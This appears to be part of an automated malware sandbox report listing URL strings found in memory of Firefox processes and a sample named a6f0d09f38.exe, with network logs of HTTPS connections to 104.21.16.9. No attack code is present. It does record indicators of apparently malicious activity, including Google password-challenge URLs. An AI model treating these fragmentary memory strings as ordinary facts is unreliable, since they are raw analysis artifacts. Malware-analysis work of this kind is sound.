Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720133791.000001DEEC120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933815847.000001DEF0379000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://browser/content/parent/ext-devtools-pane
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2754238638.000001DEF7094000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/Trying
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933815847.000001DEF0379000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001C.00000002.3012755816.000001DEEACC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 0000001C.00000003.2760314917.000001DEEFF91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2761194812.000001DEEFF92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/anything/?
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: a6f0d09f38.exe, 0000000D.00000003.2630491098.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB90C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: a6f0d09f38.exe, 0000000D.00000003.2630491098.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: firefox.exe, 0000001C.00000002.3057404604.000001DEEC9BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2877108624.000001DEFA92E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001C.00000003.2920506033.000001DEF1243000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2888648124.000001DEFA2C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2924126002.000001DEF1117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=ht
Source: firefox.exe, 00000021.00000002.2954944692.000001729E530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig
Source: firefox.exe, 0000001F.00000002.2964244095.000001D14E950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig5
Source: firefox.exe, 00000021.00000002.2952438162.000001729E3AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challeng
Source: firefox.exe, 0000001C.00000003.2882299164.000001DEFA5CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2978589406.000001DEDEB6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2977094837.000001DEDE910000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2799655475.000001DEEF282000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2799655475.000001DEEF2A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2835305075.000001DEEF2A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2835305075.000001DEEF282000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2955897457.000001C8C37B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2955897457.000001C8C37BA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2952085761.000001C8C3734000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2964244095.000001D14E954000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2950099066.000001D14E63A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2950099066.000001D14E630000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2954944692.000001729E534000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2952438162.000001729E3A0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2952438162.000001729E3AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001C.00000002.2977845893.000001DEDE990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd$
Source: firefox.exe, 0000001A.00000002.2709595092.000001D3FB20A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2715806075.0000021131BA7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2977845893.000001DEDE990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001C.00000002.2980852938.000001DEE03BB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2980852938.000001DEE03F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2955897457.000001C8C37B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2952085761.000001C8C3734000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2964244095.000001D14E954000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2950099066.000001D14E630000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2954944692.000001729E534000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2952438162.000001729E3A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49836 version: TLS 1.2
